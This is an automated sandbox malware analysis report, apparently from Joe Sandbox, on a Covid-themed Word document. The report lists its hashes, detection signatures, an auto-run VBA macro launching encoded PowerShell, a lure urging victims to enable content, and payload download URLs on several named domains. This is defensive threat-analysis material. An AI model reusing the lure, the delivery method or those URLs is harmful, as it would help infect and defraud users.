
Analysis Report: Report Covid-19.doc

Overview

General Information

Sample Name: Report Covid-19.doc
Analysis ID: 294479
MD5: 1feae5f3183009794c7287e2788f9dd7
SHA1: bcb1b7b93d568e75eff335cb132a965d30b39ae2
SHA256: 0114ef28af9fcadd963f188229d69a89ee149dd188f58b1968c65b699a4e609a

Most interesting Screenshot:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates HTML files with .exe extension (expired dropper behavior)
Creates processes via WMI
Encrypted powershell cmdline option found
Very long command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops certificate files (DER)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • powershell.exe (PID: 1320 cmdline: powershell -en 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Report Covid-19.doc; Avira: detected
Antivirus detection for URL or domain
Source: http://amessageforinnergame.com/newworld/oXJM3jA/; Avira URL Cloud: Label: malware
Source: http://thejoyflower.com/wp-admin/f5/; Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: ragantechnical.com; Virustotal: Detection: 8%
Source: jatoapp.com; Virustotal: Detection: 10%
Source: amessageforinnergame.com; Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: Report Covid-19.doc; Virustotal: Detection: 69%
Source: Report Covid-19.doc; ReversingLabs: Detection: 68%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic; DNS query: name: thejoyflower.com
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 172.67.165.88:443
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 104.24.108.69:80

Networking:

Creates HTML files with .exe extension (expired dropper behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: Gl4y9ghg.exe.2.dr
Source: global traffic; HTTP traffic detected: GET /wp-admin/f5/ HTTP/1.1 | Host: thejoyflower.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /newworld/oXJM3jA/ HTTP/1.1 | Host: amessageforinnergame.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /wp-includes/kMSx7EE/ HTTP/1.1 | Host: nescoat.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 | Host: nescoat.com
Source: Joe Sandbox View; IP Address: 104.24.108.69
Source: Joe Sandbox View; IP Address: 78.142.208.117
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454A84-8E09-401E-A760-1A1C7B299BE3}.tmp
Source: unknown; DNS traffic detected: queries for: thejoyflower.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | X-UA-Compatible: IE=edge | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://amessageforinnergame.com/wp-json/>; rel="https://api.w.org/" | Server: LiteSpeed | Connection: Keep-Alive | X-LiteSpeed-Cache: hit | Content-Length: 72270 | Date: Wed, 07 Oct 2020 11:51:50 GMT
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Gl4y9ghg.exe.2.dr; String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown; Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49174 -> 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8; Screenshot OCR: Enable Editing" and then click "Enable Content".
Source: Screenshot number: 8; Screenshot OCR: Enable Content".
Source: Document image extraction number: 0; Screenshot OCR: Enable Editing" and then click "Enable Content".
Source: Document image extraction number: 0; Screenshot OCR: Enable Content".
Source: Document image extraction number: 1; Screenshot OCR: Enable Editing" and then click "Enable Content".
Source: Document image extraction number: 1; Screenshot OCR: Enable Content".
Very long command line found
Source: unknown; Process created: Commandline size = 4528
Source: Report Covid-19.doc; OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation; OLE, VBA macro: Module Qs5q3eigprbsz5gx2h, Function Document_open; Name: Document_open
Source: Report Covid-19.doc; OLE indicator, VBA macros: true
Source: classification engine; Classification label: mal96.evad.winDOC@2/14@7/7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$port Covid-19.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRBF87.tmp
Source: Report Covid-19.doc; OLE indicator, Word Document stream: true
Source: Report Covid-19.doc; OLE document summary: edited time not present or 0